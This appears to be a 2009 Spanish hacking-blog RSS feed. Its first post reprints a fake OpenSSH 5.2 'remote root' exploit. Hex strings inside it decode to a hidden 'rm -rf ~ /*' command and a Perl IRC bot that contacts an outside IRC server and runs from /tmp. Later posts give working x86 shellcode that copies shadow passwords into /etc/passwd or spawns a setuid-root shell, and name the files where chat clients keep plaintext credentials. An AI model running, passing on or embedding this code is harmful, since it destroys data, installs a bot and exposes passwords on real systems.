tag:blogger.com,1999:blog-23164839Sun, 08 Nov 2009 15:21:48 +0000~Unix & Cisco & Hacks~...Sometimes, hacks may be ugly and only exist because someone had an itch that needed scratching. To the engineer, a hack is the ultimate expression of the Do-It-Yourself sentiment: no one understands how a hack came to be better than the person who felt compelled to solve the problem in the first place. If a person with a bent for problem solving thinks a given hack is ugly, then they are almost always irresistibly motivated to go one better and hack the hack...http://vlan7.blogspot.com/noreply@blogger.com (vlan7)Blogger322125tag:blogger.com,1999:blog-23164839.post-8898406529887785192Mon, 21 Sep 2009 23:59:00 +00002009-09-23T04:03:08.614+02:00FAKE 0day OpenSSH <= 5.2 Remote root exploitEn una entrada, admin me preguntaba si conocia un supuesto 0-day de ssh.<br /><br />Se ha quitado algo para que no compile. ¿Te refieres a este?<br /><br /><EDIT 22-9-2009><br />Ver los comentarios antes de ejecutar el exploit<br /></EDIT><br /><br />* ---------------------------<br />* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.<br />*<br />*<br />* Takes advantage of an off-by-one<br />* bug in mapped authentication space on system<br />*/<br /><br />#define VALID_RANGE 0xb44ffe00<br />#define build_frem(x,y,a,b,c) a##c##a##x##y##b<br /><br />char jmpcode[] =<br />"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"<br />"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";<br /><br />char shellcode[] =<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"<br />"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"<br />"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"<br />"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"<br />"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"<br />"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"<br />"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"<br />"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"<br />"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"<br />"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"<br />"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"<br />"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"<br />"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"<br />"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"<br />"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"<br />"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"<br />"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"<br />"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"<br />"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"<br />"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"<br />"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"<br />"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"<br />"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"<br />"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"<br />"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"<br />"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"<br />"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"<br />"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"<br />"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";<br /><br /><br />char fbsd_shellcode[] =<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"<br />"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"<br />"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"<br />"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"<br />"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"<br />"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"<br />"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"<br />"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"<br />"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"<br />"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"<br />"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"<br />"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"<br />"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"<br />"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"<br />"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"<br />"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"<br />"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"<br />"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"<br />"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"<br />"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"<br />"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"<br />"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"<br />"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"<br />"\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"<br />"\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"<br />"\x2f\x74\x6d\x70\x2f\x68\x69\x0a";<br />#define SIZE 0xffffff <br />#define OFFSET 131<br />#define fremote build_frem(t,e,s,m,y)<br /><br />void usage(char *arg){<br />printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");<br />printf(" Usage: %s -h -p port\n",arg);<br />printf(" Options:\n");<br />printf(" \t-h ip/host of target\n");<br />printf(" \t-p port\n");<br />printf(" \t-d username\n");<br />printf(" \t-B memory_limit 8/16/64\n\n\n");<br />}<br /><br />#define FD 0x080518fc<br />#define BD 0x08082000<br /><br />int main(int argc, char **argv){<br />FILE *jmpinst;<br />char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;<br />int port=23, limit=8, target=0, sock;<br />struct hostent *host;<br />struct sockaddr_in addr;<br /><br />if (geteuid()) {<br />puts("need root for raw socket, etc...");<br />return 1;<br />}<br /><br />if(argc < 3){<br />usage(argv[0]);<br />return 1;<br />}<br /><br /><br />printf("\n [+] 0wn0wn - by anti-sec group\n");<br /><br />if (!inet_aton(h, &addr.sin_addr)){<br />host = gethostbyname(h);<br />if (!host){<br />printf(" [-] Resolving failed\n");<br />return 1;<br />}<br />addr.sin_addr = *(struct in_addr*)host->h_addr;<br />}<br /><br />sock = socket(PF_INET, SOCK_STREAM, 0);<br />addr.sin_port = htons(port);<br />addr.sin_family = AF_INET;<br />if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){<br />printf(" [-] Connecting failed\n");<br />return 1;<br />}<br />payload = malloc(limit * 10000);<br />ptr = payload+8;<br />memcpy(ptr,jmpcode,strlen(jmpcode));<br />jmpinst=fopen(shellcode+793,"w+");<br />if(jmpinst){<br />fseek(jmpinst,0,SEEK_SET);<br />fprintf(jmpinst,"%s",shellcode);<br />fclose(jmpinst);<br />}<br />ptr += strlen(jmpcode);<br />if(target != 5 && target != 6){<br />memcpy(ptr,shellcode,strlen(shellcode));<br />ptr += strlen(shellcode);<br />memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));<br />}<br />else{<br />memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));<br />ptr += strlen(fbsd_shellcode);<br />memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));<br />}<br />send(sock,buffer,strlen(buffer),0);<br />send(sock,ptr,3750,0);<br />close(sock);<br />if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {<br />printf(" [-] connecting failed\n"); <br />}<br /><br />payload[sizeof(payload)-1] = '\0';<br />payload[sizeof(payload)-2] = '\0';<br />send(sock,buffer,strlen(buffer),0);<br />send(sock,payload,strlen(payload),0);<br />close(sock);<br />free(payload);<br />addr.sin_port = htons(6666);<br />if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {<br />/* v--- our cool bar that says: "r0000000t!!!" */<br />printf("\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");<br />fremote("PS1='sh-3.2#' /bin/sh");<br />}<br />else<br />printf(" [-] failed to exploit target :-(\n");<br />close(sock);<br />return 0;<br />}<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-8898406529887785192?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/KdjhIyT3lv0" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/KdjhIyT3lv0/0day-openssh-52-remote-root-exploit.htmlnoreply@blogger.com (vlan7)6http://vlan7.blogspot.com/2009/09/0day-openssh-52-remote-root-exploit.htmltag:blogger.com,1999:blog-23164839.post-2218634543751644755Mon, 21 Sep 2009 23:23:00 +00002009-09-22T01:25:52.603+02:00Husmeando en archivos (IV)<b>pidgin</b>, conocido cliente de messenger para Linux, guarda las contraseñas en texto plano tambien.<br /><br />Dentro de nuestro home, hacemos una busqueda por el archivo <b>accounts.xml</b>.<br /><br />Lamentable.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-2218634543751644755?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/XKqCl85HLTg" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/XKqCl85HLTg/husmeando-en-archivos-iv.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/09/husmeando-en-archivos-iv.htmltag:blogger.com,1999:blog-23164839.post-8193488468668910575Mon, 21 Sep 2009 23:14:00 +00002009-09-22T01:21:33.684+02:00Husmeando en archivos (III) ...cypher will not save youamsn cifra la contraseña.<br /><br />El archivo donde la guarda cifrada es:<br /><br /><b>/home/user/.amsn/config.xml</b><br /><br />La variable es <b>remotepassword</b>.<br /><br />Aunque este cifrada, que me consta que es en DES, bastaria que un atacante copiara ese <b>config.xml</b> en su maquina.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-8193488468668910575?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/BcG-vpDycUs" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/BcG-vpDycUs/husmeando-en-archivos-iii-cypher-will.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/09/husmeando-en-archivos-iii-cypher-will.htmltag:blogger.com,1999:blog-23164839.post-8631167521674964208Mon, 21 Sep 2009 23:09:00 +00002009-09-22T01:14:42.644+02:00Husmeando en archivos (II)... Kmess guarda user/pass en texto planoEste cliente de messenger para Linux, guarda user/pass en un archivo en el que tiene acceso de lectura todo el mundo:<br /><br /><b>/home/user/.kde/share/config/kmessrc</b><br /><br />amsn, mas conocido, guarda esta informacion cifrada.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-8631167521674964208?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/JOEpuIpfLTc" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/JOEpuIpfLTc/husmeando-en-archivos-ii-kmess-guarda.htmlnoreply@blogger.com (vlan7)0http://vlan7.blogspot.com/2009/09/husmeando-en-archivos-ii-kmess-guarda.htmltag:blogger.com,1999:blog-23164839.post-7058310834606505539Sun, 23 Aug 2009 18:25:00 +00002009-08-23T20:27:13.009+02:00mmm ... creo que esta es tu IP publica no?<a href="http://www.orkspace.net/owned/"><b>http://www.orkspace.net/owned/</b></a><br /><br />:)<br /><br />Gracias a sparc ;)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-7058310834606505539?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/kAgxMRQ1cTk" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/kAgxMRQ1cTk/mmm-creo-que-esta-es-tu-ip-publica-no.htmlnoreply@blogger.com (vlan7)1http://vlan7.blogspot.com/2009/08/mmm-creo-que-esta-es-tu-ip-publica-no.htmltag:blogger.com,1999:blog-23164839.post-9153362465504250851Thu, 09 Jul 2009 19:36:00 +00002009-07-10T19:49:53.865+02:00...una historia inofensiva pero real ~ XSS en la web de la Guardia Civil ~Pues nada, un XSS que descubri el otro dia jugando.<br /><br />Ahi va:<br /><br /><center>Full Disclosure 100% DIY (esto es, a mi manera)<br />donde se habla de una historia<br />inofensiva pero real<br /><b><a href="http://two.xthost.info/vlan7b/Full_Disclosure_Guardia_Civil_XSS_001.pdf">~ XSS en la web de la Guardia Civil ~</a></b><br />Por/By: vlan7 [ http://vlan7.blogspot.com ]<br />~<br />Fecha de descubrimiento y contacto con la Guardia Civil: 5-Jul-09<br />Fecha en la que la Guardia Civil responde confirmándolo: 6-Jul-09<br />Fecha en la que este XSS queda mitigado: 7-Jul-2009<br />¿Full Disclosure? released to the public: 10-Jul-2009<br />~<br /><br /><hr><br /><br /><b><i>"No hemos hecho nada del otro mundo, porque vivimos en este"</i></b><br />Eskorbuto</center><br /><br />P.D. No es mi especialidad la seguridad web, cualquier correccion sera bienvenida. Gracias.<br /><br />He añadido un archivo .ZIP con las referencias, que realmente es lo mejor del documento :D Hay alguno bastante bueno.<br /><br /><a href="http://two.xthost.info/vlan7b/Full_Disclosure_Guardia_Civil_XSS_REFERENCES_001.zip"><b>Referencias</b></a><br /><br /><a href="http://www.wadalbertia.org/phpBB2/viewtopic.php?p=56031"><b>http://www.wadalbertia.org/phpBB2/viewtopic.php?p=56031</b></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-9153362465504250851?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/79VScx_t1PA" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/79VScx_t1PA/una-historia-inofensiva-pero-real-xss.htmlnoreply@blogger.com (vlan7)2http://vlan7.blogspot.com/2009/07/una-historia-inofensiva-pero-real-xss.htmltag:blogger.com,1999:blog-23164839.post-4643332997576599454Sat, 04 Jul 2009 22:13:00 +00002009-07-11T15:11:04.916+02:00unshadow.c shellcodeEsta shellcode deshabilita el shadowing en un sistema Linux. Todos los passwords de /etc/shadow van a /etc/passwd , legible por todo el mundo :)<br /><br /><font color="#FF0000"><b>#include &lt;stdio.h&gt;<br /><br />const char sc[]= "\x31\xdb" //xor ebx,ebx<br /> "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!<br /> "\x99" //cdq<br /> "\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)<br /> "\xb0\x0b" //mov al,0bh<br /> "\x52" //push edx /Termina la cadena con un 0<br /> "\x68\x63\x6f\x6e\x76" //push dword "conv"<br /> "\x68\x70\x77\x75\x6e" //push dword "pwun"<br /> "\x68\x62\x69\x6e\x2f" //push dword "bin/"<br /> "\x68\x73\x72\x2f\x73" //push dword "sr/s"<br /> "\x68\x2f\x2f\x2f\x75" //push dword "///u"<br /> "\x89\xe3" //mov ebx,esp<br /> "\x89\xd1" //mov ecx,edx<br /> "\xcd\x80"; //int 80h<br /><br />void main()<br />{<br /> printf("\n~ This shellcode disables shadowing on a linux system ~"<br /> "\n\n\t ~ Coded by vlan7 ~"<br /> "\n\t ~ http://vlan7.blogspot.com ~"<br /> "\n\n ~ Date: 4/Jul/2009"<br /><br /> "\n\tYou'll have the passwords stored in /etc/passwd."<br /> "\n\tFor undo purposes use the pwconv command."<br /> "\n\t ~ Cheers go to: Wadalbertia"<br /> "\n\t ~ Shellcode Size: %d bytes\n\n",<br /> sizeof(sc)-1);<br /><br /> (*(void (*)()) sc)();<br />}</b></font><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-4643332997576599454?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/0ZV_Qjygeh4" height="1" width="1"/>http://feedproxy.google.com/~r/unixCiscoHacks/~3/0ZV_Qjygeh4/unshadowc-shellcode.htmlnoreply@blogger.com (vlan7)2http://vlan7.blogspot.com/2009/07/unshadowc-shellcode.htmltag:blogger.com,1999:blog-23164839.post-1933515355948367887Sat, 04 Jul 2009 18:28:00 +00002009-07-12T09:28:12.877+02:00Y sigue el culebron... Smallest (27 bytes) GNU/Linux x86 setuid/execve shellcode without NULLs<font color="#FF0000"><big><big><big><b>Como no sabia que era imposible lo hice<br /><br><br />27 bytes!!!</b></big></big></big> :) <br /><br />#include &lt;stdio.h&gt;<br /><br />const char sc[]= "\x31\xdb" //xor ebx,ebx<br /> "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push/pop!<br /> "\x99" //cdq<br /> "\xcd\x80" //int 80 //setuid(0) should returns 0 right? ;)<br /> "\xb0\x0b" //mov al,0bh<br /> "\x52" //push edx /Termina la cadena //bin/sh con un 0<br /> "\x68\x6e\x2f\x73\x68" //push dword "hs/n"<br /> "\x68\x2f\x2f\x62\x69" //push dword "ib//"<br /> "\x89\xe3" //mov ebx,edx<br /> "\x89\xd1" //mov ecx,edx<br /> "\xcd\x80"; //int 80h<br /><br />int main()<br />{<br /> printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE "<br />"WITHOUT NULLS THAT SPAWNS A SHELL"<br /> "\n\nCoded by vlan7"<br /> "\n\t + vlan7[at]bigfoot.com"<br /> "\n\t + http://vlan7.blogspot.com"<br /> "\n\n[+] Date: 4/Jul/2009"<br /> "\n[+] Thanks to: sch3m4"<br /> "\n\n[+] Shellcode Size: %d bytes\n\n",<br /> sizeof(sc)-1);<br /> (*(void (*)()) sc)();<br /> return 0;<br />}</font><br /><br />Voy a citar de <a href="http://www.opengroup.org/onlinepubs/000095399/functions/setuid.html"><b>aqui</b></a> el funcionamiento de setuid().<br /><br /><i><u>RETURN VALUE</u></i><br /><br />Upon successful completion, 0 shall be returned. Otherwise, -1 shall be returned and errno set to indicate the error.<br /><br /><i><u>ERRORS</u></i><br /><br />The setuid() function shall fail, return -1, and set errno to the corresponding value if one or more of the following are true:<br /><br />Veamos si entramos en alguno de los casos:<br /><br /><i><u>[EINVAL]</u><br />The value of the uid argument is invalid and not supported by the implementation</i><br /><br />No. UID=0 es un UID valido. Es el r00t!<br /><br /><i><u>[EPERM]</u><br />The process does not have appropriate privileges and uid does not match the real user ID or the saved set-user-ID.</i><br /><br />Logicamente, esto ultimo puede pasar en la version a la que se llego anteriormente.<br /><br />Ah, y aqui el hilo de Wadalbertia:<br /><br /><a href="http://www.wadalbertia.org/phpBB2/viewtopic.php?t=5139"><b>Smallest GNU/Linux x86 setuid/execve shellcode without NULLs</b></a><br /><br />Stay clean,<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23164839-1933515355948367887?l=vlan7.blogspot.com'/></div><img src="http://feeds.feedburner.com/~r/unixCiscoHacks/~4/l0kBwvcpck8" height="1" 